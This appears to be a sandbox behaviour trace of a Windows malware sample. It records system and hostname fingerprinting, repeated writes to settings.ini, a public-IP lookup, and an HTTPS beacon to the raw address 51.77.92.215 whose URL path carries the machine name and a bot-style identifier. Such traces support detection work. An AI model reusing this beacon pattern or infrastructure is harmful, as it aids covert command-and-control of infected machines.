Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
File	Get Info	filename = Data\, type = file_attributes	1	Fn
File	Create Directory	Data\	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Computer Name	result_out = ZGW5TDPU	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	32	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Create	filename = settings.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
File	Write	filename = settings.ini, size = 12	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 36	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 48	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 68	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 65	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 43	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 71	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 53	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 75	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 21	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 61	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 45	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 41	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 23	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 83	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 34	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 24	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 31	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 49	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 54	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 38	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 57	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 67	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 36	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 29	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 80	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 33	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 67	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 17	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 81	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 36	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 23	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 85	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 36	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 62	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 61	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 41	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 72	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 66	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 77	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 36	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 63	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 76	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 58	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 83	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 41	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 29	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 36	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 78	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 15	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 61	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 19	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 83	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 26	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 81	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 65	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 22	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 63	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 13	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 71	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 23	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 70	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 77	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 47	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 64	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 22	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 15	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 38	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 27	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 37	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 87	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 21	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 26	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 75	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 47	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 58	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 38	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 19	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 43	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 21	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 18	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 24	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 17	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 48	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 29	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 14	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 52	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 18	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 63	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 24	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 29	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 39	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 26	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 91	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 67	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 76	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 77	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 11	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 83	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 49	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 16	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 57	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 74	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 86	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 13	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 69	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 21	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 55	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 56	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 74	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 88	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 28	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 34	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 24	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 48	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 70	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 81	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 62	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 78	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 61	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 74	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 44	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 31	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 49	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 56	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 19	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 85	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 20	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 48	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 68	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 86	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 36	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 32	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 21	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 32	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 45	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 55	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 29	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 53	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 16	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 58	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 79	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 80	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 29	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 52	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 77	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 69	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 79	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 67	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 51	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 72	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 16	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 66	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 66	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 43	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 79	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 35	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 73	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 16	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 30	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 73	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 45	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 54	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 72	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 55	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 43	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 63	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 69	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 34	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 81	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 70	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 63	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 62	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 81	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 67	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 46	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 25	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 72	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 85	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 78	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 32	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 21	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 117	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 22	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 44	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 38	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 19	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 169	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 81	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 51	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 70	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 67	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 10	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 2668	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 56	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 18	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 20	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 75	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 37	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 40	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 65	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 68	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 18	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 18	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 15	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 42	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 63	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 76	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 39	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 68	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 76	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 17	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 83	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 33	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 63	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 34	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 35	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 21	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 85	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 32	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 53	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 25	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 58	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 25	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 20	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 35	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 25	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 46	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 73	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 26	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 44	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 81	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 51	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 42	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 48	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 43	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 80	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 12	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 41	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 80	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 68	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 36	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 46	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 62	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 69	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 31	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 23	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 29	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
File	Write	filename = settings.ini, size = 42	1	Fn Data
File	Write	filename = settings.ini, size = 2	1	Fn Data
System	Get Time	type = System Time, time = 2019-05-14 15:31:51 (UTC)	1	Fn
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = api.ip.sb, server_port = 443	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /ip, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = api.ip.sb/ip	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Read Response	size = 14, size_out = 14	1	Fn Data
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:31:51 (UTC)	1	Fn
Inet	Open Connection	protocol = HTTPS, server_name = 51.77.92.215, server_port = 443	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:31:51 (UTC)	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/spk/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 51.77.92.215/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/spk/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Read Response	size = 224, size_out = 224	1	Fn Data
System	Get Info	type = Operating System	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:32:07 (UTC)	2	Fn
Inet	Close Session	-	1	Fn
